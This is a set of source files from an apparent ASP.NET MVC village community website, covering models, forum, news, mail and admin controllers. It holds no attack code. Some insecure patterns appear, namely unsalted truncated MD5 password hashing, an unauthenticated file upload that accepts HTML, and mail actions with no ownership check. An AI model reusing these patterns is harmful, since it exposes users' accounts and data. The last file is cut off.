"src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Villager\")]\n public partial class Villager\n {\n public int ID { get; set; }\n\n [Required]\n [StringLength(64)]\n public string UserName { get; set; }\n\n [Required]\n [StringLength(64)]\n public string Password { get; set; }\n\n [Required]\n [StringLength(64)]\n public string RealName { get; set; }\n\n [StringLength(64)]\n public string Mobile { get; set; }\n\n public DateTime? CreatTime { get; set; }\n\n public DateTime? 
LastLoginTime { get; set; }\n\n [StringLength(64)]\n public string LastLoginIP { get; set; }\n\n public bool Enabled { get; set; }\n\n public bool IsDeleted { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6096000075340271, "avg_line_length": 22.148147583007812, "blob_id": "7e7eb20eacf1bba3b5837ad5e6b5eeab7a024c0b", "content_id": "e455e425e4ee5568cf2f167de28c38d566137af6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 625, "license_type": "no_license", "max_line_length": 55, "num_lines": 27, "path": "/GDKQ.Model/Category.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Category\")]\n public partial class Category\n {\n public int ID { get; set; }\n\n [Required]\n [StringLength(64)]\n public string CaName { get; set; }\n\n [Required]\n [StringLength(64)]\n public string bh { get; set; }\n\n [StringLength(64)]\n public string pbh { get; set; }\n\n public DateTime CreateTime { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.5652841925621033, "alphanum_fraction": 0.5898617506027222, "avg_line_length": 25.040000915527344, "blob_id": "aa7b5245480a988d014cc8c47945fc3eb26c81e3", "content_id": "fdbc1ec8540885c767cdd1dfa1188db2b3d22acd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 659, "license_type": "no_license", "max_line_length": 106, "num_lines": 25, "path": "/Common/MD5.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Security.Cryptography;\nusing System.Text;\nusing System.Threading.Tasks;\n\nnamespace Common\n{\n public class MD5\n {\n /// <summary>\n /// 16位MD5加密\n /// </summary>\n /// <param name=\"password\"></param>\n /// <returns></returns>\n public static string MD5Encrypt16(string password)\n {\n var md5 = new MD5CryptoServiceProvider();\n string t2 = BitConverter.ToString(md5.ComputeHash(Encoding.Default.GetBytes(password)), 4, 8);\n t2 = t2.Replace(\"-\", \"\");\n return t2;\n }\n }\n}\n" }, { "alpha_fraction": 0.5297651290893555, "alphanum_fraction": 0.5417804718017578, "avg_line_length": 32.925926208496094, "blob_id": "1c9a581eaef9af0573c05a5f29b2284ccb17a112", "content_id": "74923b79ffbd3e0b665c6ebe39bb1f47d75c750e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1891, "license_type": "no_license", "max_line_length": 207, "num_lines": 54, "path": "/GDKQ.Web/Areas/BBS/Controllers/HomeController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.BBS.Controllers\n{\n public class HomeController : Controller\n {\n public class viewModel\n {\n public List<Model.Article> Article01 { get; set; }//最新文章\n public List<Model.Article> Article04 { get; set; }//精华文章\n\n public viewModel(List<Model.Article> ArticleList01, List<Model.Article> ArticleList04)\n {\n this.Article01 = ArticleList01;\n this.Article04 = ArticleList04;\n }\n }\n /// <summary>\n /// 论坛首页\n /// </summary>\n /// 
<returns></returns>\n public ActionResult Index()\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n var vm = new viewModel(\n dal.Article.Where(x => x.CategoryID == \"01\" && x.IsDeleted == true && x.Enable == true).OrderByDescending(x => x.CreateTime).Take(5).ToList<Model.Article>(),\n dal.Article.Where(x => x.CategoryID == \"04\" && x.IsDeleted == true && x.Enable == true).OrderByDescending(x=>x.like_count).OrderByDescending(x => x.CreateTime).Take(5).ToList<Model.Article>()\n );\n ViewBag.Title = \"论坛首页\";\n return View(vm);\n }\n\n\n\n [HttpPost]\n public ActionResult AddLike(int? id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article a = dal.Article.SingleOrDefault(x => x.ID == id);\n if (a == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该文章\" });\n }\n a.like_count++;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"点赞成功\" });\n }\n }\n}" }, { "alpha_fraction": 0.4910096824169159, "alphanum_fraction": 0.4951590597629547, "avg_line_length": 28.324323654174805, "blob_id": "8251952aeb624300d37d09c394f5785a1b1e5c14", "content_id": "90acc986acaddc00ee7017a4641ad7d673917eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2313, "license_type": "no_license", "max_line_length": 143, "num_lines": 74, "path": "/GDKQ.Web/Areas/Livelihood/Controllers/NewsController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.Livelihood.Controllers\n{\n /// <summary>\n /// 新闻管理器(村务)\n /// </summary>\n public class NewsController : Controller\n {\n /// <summary>\n /// 新闻列表\n /// </summary>\n /// <param name=\"bh\">分类编号</param>\n /// <param name=\"pageindex\">当前页面页数</param>\n /// <returns></returns>\n public ActionResult List(string bh, int pageindex = 1)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Category ca = dal.Category.SingleOrDefault(x => x.bh == bh);\n if (ca==null)\n {\n return Content(\"没有该分类的新闻\");\n }\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n total = dal.News.Count(x=>x.bh==ca.bh&&x.IsDeleted==true);\n if (total <1)\n {\n return Content(\"数据库中没有该新闻\");\n }\n \n List<Model.News> list0 = dal.News.Where(\n x=>x.bh==ca.bh && x.IsDeleted == true).OrderBy(a => a.ID).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.News>();\n PagedList<GDKQ.Model.News> list = new PagedList<Model.News>(list0, pageindex, pagesize, total);\n ViewBag.Title = ca.CaName;\n ViewBag.bh = ca.bh;\n \n return View(list);\n\n }\n\n\n /// <summary>\n /// 村务单页新闻(list下的)\n /// </summary>\n /// <param name=\"id\">新闻ID</param>\n /// <returns></returns>\n public ActionResult OnePage(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.News n = dal.News.SingleOrDefault(x => x.ID == id);\n if (n==null)\n {\n return Content(\"数据库中没有该新闻\");\n }\n n.VisitNum += 1;\n dal.SaveChanges();\n ViewBag.Title = n.CaName;\n return View(n);\n }\n\n public ActionResult Services()\n {\n ViewBag.Title = \"便民服务\";\n return View();\n }\n\n }\n}" }, { "alpha_fraction": 0.5843164324760437, "alphanum_fraction": 0.6079111695289612, "avg_line_length": 59, "blob_id": "d4d6c10f547a5f53fb69d35ebb5b55e107f76afd", "content_id": "19c3a58e7838ce103656c457903d7cac05da7f03", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1441, 
"license_type": "permissive", "max_line_length": 228, "num_lines": 24, "path": "/GDKQ.Web/Content/main/js/bg.js", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "var billType={payout:1,transferOut:2,borrow:3,borrowBack:4,income:5,lend:6,lendBack:7,transferIn:8,daifu:12};\nvar billManager={\n\taddType:billType.payout,realType:billType.payout,moreIsShow:false,typePos:new Array(-1,0,2,3,3,1,3,3),money2IsShow:false,showMore:function(){if(billManager.moreIsShow==true){this.closeMore()\n\t}else{\n\t\t$(\"#type-more\").addClass(\"btnshow\");$(\"#type-more-box\").show();billManager.moreIsShow=true}\n\t\t},closeMore:function(){\n\t\t\tif(billManager.moreIsShow==true)\n\t\t\t{$(\"#type-more-box\").hide();$(\"#type-more\").removeClass(\"btnshow\");billManager.moreIsShow=false}\n\t\t\t},moreButtonClick:function(type)\n\t\t\t{\n\t\t\t\t$(\"#tm-3,#tm-4,#tm-6,#tm-7,#tm-12,#tm-l-3,#tm-l-4,#tm-l-6,#tm-l-7,#tm-l-12\").remove();\n\t\t\t\t$(\"#type-menu-ul\").append('<li class=\"tm-l\" id=\"tm-l-'+type+'\"></li><li class=\"tm-n\" id=\"tm-'+type+'\"><a onclick=\"javascript:billManager.changeType('+type+');\"></a></li>');addMouseStyle($(\"#tm-\"+type+\" a\"),\"hover\",\"active\");\n\t\t\t\t$(\"#tm-\"+type+\" a\").click();\n\t\t\t\t},changeType:function(typeId){\n\t\t\t\t\tvar pos=$(\"#type-menu-ul .tm-n\").index($(\"#tm-\"+typeId));$(\"#type-menu li.tm-l\").removeClass(\"tm-l-no\");\n\t\t\t\t$(\"#type-menu li.tm-l\").eq(pos).addClass(\"tm-l-no\");if(pos>0)\n\t\t\t\t{\n\t\t\t\t\t$(\"#type-menu li.tm-l\").eq(pos-1).addClass(\"tm-l-no\")\n\t\t\t\t}$(\"#type-menu a\").removeClass(\"select\");$(\"#tm-\"+typeId+\" a\").addClass(\"select\");\n\t\t\t\t\t\n\t\t\t\t\t\t$(\"#tb-m .tb-ul-1\").hide();\n\t\t\t\t\t\t$(\"#tbul-\"+typeId).show();\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t\t\t\t\t};\n\n" }, { "alpha_fraction": 0.5789473652839661, "alphanum_fraction": 0.6087257862091064, "avg_line_length": 59.125, "blob_id": "ff9b6569f43811d4a781bc6cb3bf155ee2b2cab7", "content_id": "1fb7006c66a849127a14dfb7a5a626b2f41b4941", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1444, "license_type": "permissive", "max_line_length": 228, "num_lines": 24, "path": "/GDKQ.Web/Content/main/js/bg1.js", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "var billType1={payout:1,transferOut:2,borrow:3,borrowBack:4,income:5,lend:6,lendBack:7,transferIn:8,daifu:12};\nvar billManager1={\n\taddType:billType1.payout,realType:billType1.payout,moreIsShow:false,typePos:new Array(-1,0,2,3,3,1,3,3),money2IsShow:false,showMore:function(){if(billManager1.moreIsShow==true){this.closeMore()\n\t}else{\n\t\t$(\"#type-more\").addClass(\"btnshow\");$(\"#type-more-box\").show();billManager1.moreIsShow=true}\n\t\t},closeMore:function(){\n\t\t\tif(billManager1.moreIsShow==true)\n\t\t\t{$(\"#type-more-box\").hide();$(\"#type-more\").removeClass(\"btnshow\");billManager1.moreIsShow=false}\n\t\t\t},moreButtonClick:function(type)\n\t\t\t{\n\t\t\t\t$(\"#tz-3,#tz-4,#tz-6,#tz-7,#tz-12,#tz-l-3,#tz-l-4,#tz-l-6,#tz-l-7,#tz-l-12\").remove();\n\t\t\t\t$(\"#tzls_box-ul\").append('<li class=\"tz-l\" id=\"tz-l-'+type+'\"></li><li class=\"tz-n\" id=\"tz-'+type+'\"><a onclick=\"javascript:billManager1.changeType('+type+');\"></a></li>');addMouseStyle($(\"#tz-\"+type+\" a\"),\"hover\",\"active\");\n\t\t\t\t$(\"#tz-\"+type+\" a\").click();\n\t\t\t\t},changeType:function(typeId){\n\t\t\t\t\tvar pos=$(\"#tzls_box-ul 
.tz-n\").index($(\"#tz-\"+typeId));$(\"#tzls_box li.tz-l\").removeClass(\"tz-l-no\");\n\t\t\t\t$(\"#tzls_box li.tz-l\").eq(pos).addClass(\"tz-l-no\");if(pos>0)\n\t\t\t\t{\n\t\t\t\t\t$(\"#tzls_box li.tz-l\").eq(pos-1).addClass(\"tz-l-no\")\n\t\t\t\t}$(\"#tzls_box a\").removeClass(\"select\");$(\"#tz-\"+typeId+\" a\").addClass(\"select\");\n\t\t\t\t\t\n\t\t\t\t\t\t$(\"#tz-m .tz-ul-1\").hide();\n\t\t\t\t\t\t$(\"#tzul-\"+typeId).show();\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t\t\t\t\t};\n\n" }, { "alpha_fraction": 0.5862952470779419, "alphanum_fraction": 0.6378481984138489, "avg_line_length": 62.75510025024414, "blob_id": "40457e045d1c055e92b6f1bd70663ced763c3206", "content_id": "1c3ec19fd6b1c3d3ab12484a9f98fd4ce99ee3d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3298, "license_type": "permissive", "max_line_length": 638, "num_lines": 49, "path": "/GDKQ.Web/Content/main/js/1507011715567555.js", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "document.writeln(\"<style type=\\'text/css\\'>\");\ndocument.writeln(\"<!-- \");\ndocument.writeln(\"a.db {\");\ndocument.writeln(\" FONT-FAMILY:\\'宋体\\';\");\ndocument.writeln(\"\tfont-size:12px;\");\ndocument.writeln(\"\ttext-decoration:none;\");\ndocument.writeln(\"\tcolor:#b4b4b4;\");\ndocument.writeln(\"}\");\ndocument.writeln(\"a.db:visited {\");\ndocument.writeln(\" FONT-FAMILY:\\'宋体\\';\");\ndocument.writeln(\"\tfont-size:12px;\");\ndocument.writeln(\"\ttext-decoration:none;\");\ndocument.writeln(\"\tcolor:#b4b4b4;\");\ndocument.writeln(\"}\");\ndocument.writeln(\"a.db:hover {\");\ndocument.writeln(\" FONT-FAMILY:\\'宋体\\';\");\ndocument.writeln(\"\tfont-size:12px;\");\ndocument.writeln(\"\ttext-decoration: underline;\");\ndocument.writeln(\"\tcolor:#fe4310;\");\ndocument.writeln(\"}\");\ndocument.writeln(\"-->\");\ndocument.writeln(\"</style>\");\ndocument.writeln(\"\");\ndocument.writeln(\"<table width=\\'100%\\' border=\\'0\\' cellspacing=\\'0\\' cellpadding=\\'0\\' bgcolor=\\'#545454\\' height=\\'127\\'>\");\ndocument.writeln(\" <tr>\");\ndocument.writeln(\" <td> </td>\");\ndocument.writeln(\" <td width=\\'100%\\'>\");\ndocument.writeln(\" \t<table width=\\'1000\\' border=\\'0\\' cellspacing=\\'0\\' cellpadding=\\'0\\' align=\\'center\\'>\");\ndocument.writeln(\" <tr>\");\ndocument.writeln(\" <td width=\\'50\\' align=\\'center\\'></td> \");\ndocument.writeln(\"<td width=\\'100\\' align=\\'center\\'><table width=\\'100%\\' border=\\'00\\' cellspacing=\\'0\\' cellpadding=\\'0\\'>\");\ndocument.writeln(\" <tr>\");\ndocument.writeln(\" <td><script id=\\'_jiucuo_\\' sitecode=\\'3310000002\\' src=\\'http://pucha.kaipuyun.cn/exposure/jiucuo.js\\'></script></td>\");\ndocument.writeln(\" </tr>\");\ndocument.writeln(\"</table></td>\");\ndocument.writeln(\" <td width=\\'80\\'><div align=\\'center\\'><iframe src=\\'/col/col22261/index.html\\' frameborder=\\'0\\' style=\\'width:80px;height:80px;\\' scrolling=\\'no\\'></iframe></div></td>\");\ndocument.writeln(\" <td width=\\'15\\'> </td>\");\ndocument.writeln(\" <td width=\\'683\\' align=\\'left\\' valign=\\'top\\' style=\\'color:#b4b4b4; font-size:12px; line-height:26px;\\'><a href=\\'http://www.zjtz.gov.cn/col/col2889/index.html\\' class=\\'db\\'>网站声明</a> | <a href=\\'http://www.zjtz.gov.cn/col/col2892/index.html\\' class=\\'db\\'>联系我们</a> | <a href=\\'http://www.zjtz.gov.cn/col/col2893/index.html\\' class=\\'db\\'>隐私安全</a> | <a href=\\'http://www.zjtz.gov.cn/col/col2894/index.html\\' 
class=\\'db\\'>免责声明</a> | <a href=\\'http://www.zjtz.gov.cn/col/col3743/index.html\\' class=\\'db\\'>访问统计</a> | <a href=\\'http://mail.zjtz.gov.cn/login.html\\' target=\\'_blank\\' class=\\'db\\'>邮箱登陆</a>\");\ndocument.writeln(\"<br>\");\ndocument.writeln(\"主办:中共台州市委 台州市人民政府 承办:台州市委市政府信息中心 E_mail:[email protected] 浙ICP备09021086号-2 <br><a class=\\'db\\' target=\\'_blank\\' href=\\'http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=33100202000542\\'>浙公网安备33100202000542号</a>\");\ndocument.writeln(\"\");\ndocument.writeln(\"<br>建议使用IE8.0以上浏览器浏览 1024×768分辨率 2003-2010 版权所有\t\t\t</td> \");\ndocument.writeln(\" </tr>\");\ndocument.writeln(\" </table>\");\ndocument.writeln(\"\");\ndocument.writeln(\" </td>\");\ndocument.writeln(\" <td> </td>\");\ndocument.writeln(\" </tr>\");\ndocument.writeln(\"</table>\");" }, { "alpha_fraction": 0.5220694541931152, "alphanum_fraction": 0.5265918970108032, "avg_line_length": 33.12963104248047, "blob_id": "4cfc0c1bda6bcf6c78eb4e7d22a2cbd38aca59f3", "content_id": "247c36abc587d1933d519c423c83defacc847693", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 5788, "license_type": "no_license", "max_line_length": 141, "num_lines": 162, "path": "/GDKQ.Web/Areas/Adm1n/Controllers/HomeController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using LitJson;\nusing System;\nusing System.Collections;\nusing System.Collections.Generic;\nusing System.Globalization;\nusing System.IO;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing GDKQ.Model;\nusing Common;\n\nnamespace GDKQ.Web.Areas.Adm1n.Controllers\n{\n public class HomeController : Controller\n {\n [Filter.AdminLoginFilter]\n //后台主页\n public ActionResult Index()\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n int Advice = dal.Advice.Count(x => x.IsRead == true);\n int VotePercent = 62;\n int ArtcleNum= dal.Article.Count(x => x.Enable == false);\n int VisitNum = 654;\n List<Model.Article> listA = dal.Article.Where(x => x.Enable == false && x.IsDeleted == true).OrderByDescending(x \n => x.CreateTime).Take(10).ToList<Model.Article>();\n List<Model.Advice> listAD= dal.Advice.Where(x =>x.IsRead==true).OrderByDescending(x\n => x.CreateTime).Take(10).ToList<Model.Advice>();\n viewModel vm = new viewModel(Advice, VotePercent, ArtcleNum, VisitNum,listA,listAD);\n return View(vm);\n }\n\n public class viewModel\n {\n public List<Advice> listAD { get; set; }//建议列表\n public int Advice { get; set; }//建议\n public int VotePercent { get; set; }//投票\n public int ArtcleNum { get; set; }//文章审核\n public int VisitNum { get; set; }//访问统计\n public List<Model.Article> listA { get; set; }//文章列表\n\n public viewModel(int advice, int votePercent, int artcleNum, int visitNum, List<Article> listA, List<Advice> listAD)\n {\n this.Advice = advice;\n this.VotePercent = votePercent;\n this.ArtcleNum = artcleNum;\n this.VisitNum = visitNum;\n this.listA = listA;\n this.listAD = listAD;\n }\n }\n\n /// <summary>\n /// 上传列表图片\n /// </summary>\n /// <returns></returns>\n public ActionResult SaveMedia()\n {\n return Json(new { status = \"y\", info = \"上传成功\" });\n //HttpPostedFileBase imgFile = Request.Files[\"imgFile\"];\n }\n /// <summary>\n /// Kindeditor在线上传\n /// </summary>\n /// <returns></returns>\n public ActionResult Kindeditor_Upload()\n {\n //文件保存目录路径\n String savePath = \"/upload/\";\n\n\n //文件保存目录URL\n String saveUrl = \"/upload/\";\n\n //定义允许上传的文件扩展名\n Hashtable extTable = new Hashtable();\n extTable.Add(\"image\", 
\"gif,jpg,jpeg,png,bmp\");\n extTable.Add(\"flash\", \"swf,flv\");\n extTable.Add(\"media\", \"swf,flv,mp3,wav,wma,wmv,mid,avi,mpg,asf,rm,rmvb\");\n extTable.Add(\"file\", \"doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2\");\n\n //最大文件大小\n int maxSize = 1000000;\n\n HttpPostedFileBase imgFile = Request.Files[\"imgFile\"];\n if (imgFile == null)\n {\n showError(\"请选择文件。\");\n }\n\n String dirPath = Server.MapPath(savePath);\n if (!Directory.Exists(dirPath))\n {\n showError(\"上传目录不存在。\");\n }\n\n String dirName = Request.QueryString[\"dir\"];\n if (String.IsNullOrEmpty(dirName))\n {\n dirName = \"image\";\n }\n if (!extTable.ContainsKey(dirName))\n {\n showError(\"目录名不正确。\");\n }\n\n String fileName = imgFile.FileName;\n String fileExt = Path.GetExtension(fileName).ToLower();\n\n if (imgFile.InputStream == null || imgFile.InputStream.Length > maxSize)\n {\n showError(\"上传文件大小超过限制。\");\n }\n\n if (String.IsNullOrEmpty(fileExt) || Array.IndexOf(((String)extTable[dirName]).Split(','), fileExt.Substring(1).ToLower()) == -1)\n {\n showError(\"上传文件扩展名是不允许的扩展名。\\n只允许\" + ((String)extTable[dirName]) + \"格式。\");\n }\n\n //创建文件夹\n dirPath += dirName + \"/\";\n saveUrl += dirName + \"/\";\n if (!Directory.Exists(dirPath))\n {\n Directory.CreateDirectory(dirPath);\n }\n String ymd = DateTime.Now.ToString(\"yyyyMMdd\", DateTimeFormatInfo.InvariantInfo);\n dirPath += ymd + \"/\";\n saveUrl += ymd + \"/\";\n if (!Directory.Exists(dirPath))\n {\n Directory.CreateDirectory(dirPath);\n }\n\n String newFileName = DateTime.Now.ToString(\"yyyyMMddHHmmss_ffff\", DateTimeFormatInfo.InvariantInfo) + fileExt;\n String filePath = dirPath + newFileName;\n\n imgFile.SaveAs(filePath);\n\n String fileUrl = saveUrl + newFileName;\n\n Hashtable hash = new Hashtable();\n hash[\"error\"] = 0;\n hash[\"url\"] = fileUrl;\n Response.AddHeader(\"Content-Type\", \"text/html; charset=UTF-8\");\n Response.Write(JsonMapper.ToJson(hash));\n Response.End();\n return null;\n }\n\n private void showError(string message)\n {\n Hashtable hash = new Hashtable();\n hash[\"error\"] = 1;\n hash[\"message\"] = message;\n Response.AddHeader(\"Content-Type\", \"text/html; charset=UTF-8\");\n Response.Write(JsonMapper.ToJson(hash));\n Response.End();\n }\n }\n}" }, { "alpha_fraction": 0.5952380895614624, "alphanum_fraction": 0.6036414504051208, "avg_line_length": 22.032258987426758, "blob_id": "f46b64ad102006632b8e97036c0fdb76cf6e724f", "content_id": "ab2fa10b11946ffdff2fa65284bd7462fa607ae9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 714, "license_type": "no_license", "max_line_length": 55, "num_lines": 31, "path": "/GDKQ.Model/Photo.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "namespace GDKQ.Model\n{\n using System;\n using System.Collections.Generic;\n using System.ComponentModel.DataAnnotations;\n using System.ComponentModel.DataAnnotations.Schema;\n using System.Data.Entity.Spatial;\n\n [Table(\"Photo\")]\n public partial class Photo\n {\n public int ID { get; set; }\n\n [StringLength(10)]\n public string author { get; set; }\n\n [StringLength(10)]\n public string place { get; set; }\n\n public int like_count { get; set; }\n\n public DateTime CreateTime { get; set; }\n\n [StringLength(64)]\n public string Title { get; set; }\n\n public string Body { get; set; }\n\n public string Url { get; set; }\n }\n}\n" }, { "alpha_fraction": 0.4746987819671631, "alphanum_fraction": 0.4773494005203247, "avg_line_length": 32.20800018310547, 
"blob_id": "8184fe5004bf6c1460897e32b86b61e318e6ad2e", "content_id": "f18b82e3f5114ffb7dc4e2ac83fe68c57a4fd312", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 4314, "license_type": "no_license", "max_line_length": 182, "num_lines": 125, "path": "/GDKQ.Web/Areas/User/Controllers/MailController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.User.Controllers\n{\n [Filter.UserLoginFilter]\n public class MailController : Controller\n {\n /// <summary>\n /// 邮件列表\n /// </summary>\n /// <returns></returns>\n public ActionResult List(int pageindex = 1)\n {\n int pagesize = 10;\n int total = 0;\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Content(\"请重新登录\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui == null)\n {\n return Content(\"没有该用户资料\");\n }\n total = dal.Mail.Count(a => a.To_UID == u.ID&&a.IsDelect==true);\n List<Model.Mail> list0 = dal.Mail.Where(m => m.To_UID == u.ID && m.IsDelect == true).OrderBy(m=>m.IsRead).OrderBy(m => m.CreateTime).Skip((pageindex - 1) * pagesize).Take\n (pagesize).ToList<Model.Mail>();\n PagedList<GDKQ.Model.Mail> list = new PagedList<Model.Mail>(list0, pageindex, pagesize, total);\n ViewBag.username = ui.Nickname;\n return View(list);\n }\n\n \n public ActionResult Read(int Mail)\n {\n Model.User u = Session[\"user\"] as Model.User;\n if (u==null)\n {\n return Content(\"请重新登录\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui==null)\n {\n return Content(\"没有该用户资料\");\n }\n Model.Mail mail = dal.Mail.SingleOrDefault(x => x.ID == Mail);\n if (mail==null)\n {\n return Content(\"没有相关邮件信息\");\n }\n mail.IsRead = false;\n dal.SaveChanges();\n return View(mail);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Reply(string Mail,string Title,string Body)\n {\n int MailID= Convert.ToInt16(Mail);\n if (string.IsNullOrEmpty(Title)||string.IsNullOrEmpty(Body))\n {\n return Json(new { status = \"n\", info = \"请填写完整的回信信息\" });\n }\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Content(\"请重新登录\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui == null)\n {\n return Content(\"没有该用户资料\");\n }\n Model.Mail mail = dal.Mail.SingleOrDefault(x => x.ID ==MailID);\n if (mail == null)\n {\n return Content(\"没有相关邮件信息\");\n }\n dal.Mail.Add(new Model.Mail()\n {\n Title = Title,\n Body = Body,\n CreateTime = DateTime.Now,\n From_UID = mail.To_UID,\n To_UID=mail.From_UID,\n From_Name=mail.To_Name,\n To_Name=mail.From_Name,\n IsDelect=true,\n IsRead=true,\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"回信成功\" });\n }\n\n\n public ActionResult Delect(string Mail)\n {\n int MailID= Convert.ToInt16(Mail);\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Content(\"请重新登录\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Mail m = dal.Mail.SingleOrDefault(x => x.ID == MailID);\n if (m==null)\n {\n return Content(\"没有相应邮件\");\n }\n m.IsDelect = false;\n dal.SaveChanges();\n return RedirectToAction(\"List\");\n }\n 
}\n}" }, { "alpha_fraction": 0.6671597361564636, "alphanum_fraction": 0.6671597361564636, "avg_line_length": 34.605262756347656, "blob_id": "dcff9177df42f81dc8db4d82b4d65be2f714265a", "content_id": "c1cb6d2319fb1b3e54557fcb0d75bdb659faa3cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1508, "license_type": "no_license", "max_line_length": 130, "num_lines": 38, "path": "/GDKQ.Web/Filter/UserLoginFilter.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\n\nnamespace GDKQ.Web.Filter\n{\n \n public class UserLoginFilter :ActionFilterAttribute\n {\n public override void OnActionExecuting(ActionExecutingContext filterContext)\n {\n //HttpContext.Current.Response.Write(\"OnActionExecuting:正要准备执行Action的时候但还未执行时执行<br />\");\n if (HttpContext.Current.Session[\"user\"] == null)\n {\n HttpContext.Current.Response.Write(\"<script>alert('您无权访问该页面,请重新登录');location.href='/Login'</script>\");\n HttpContext.Current.Response.End();\n return;\n }\n }\n\n public override void OnActionExecuted(ActionExecutedContext filterContext)\n {\n //HttpContext.Current.Response.Write(\"OnActionExecuted:Action执行时但还未返回结果时执行<br />\");\n }\n\n public override void OnResultExecuting(ResultExecutingContext filterContext)\n {\n // HttpContext.Current.Response.Write(\"OnResultExecuting:OnResultExecuting也和OnActionExecuted一样,但前者是在后者执行完后才执行<br />\");\n }\n\n public override void OnResultExecuted(ResultExecutedContext filterContext)\n {\n // HttpContext.Current.Response.Write(\"OnResultExecuted:是Action执行完后将要返回ActionResult的时候执行<br />\");\n }\n }\n}" }, { "alpha_fraction": 0.5089776515960693, "alphanum_fraction": 0.5141077041625977, "avg_line_length": 34.45454406738281, "blob_id": "abac5465b3977f16f1633c95a0f9decd3944542f", "content_id": "2ca16d6c4dd274663e23d00a363433633d00cd1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2879, "license_type": "no_license", "max_line_length": 249, "num_lines": 77, "path": "/GDKQ.Web/Areas/User/Controllers/UserInfoModController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using Common;\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\n\nnamespace GDKQ.Web.Areas.User.Controllers\n{\n public class UserInfoModController : Controller\n {\n // GET: 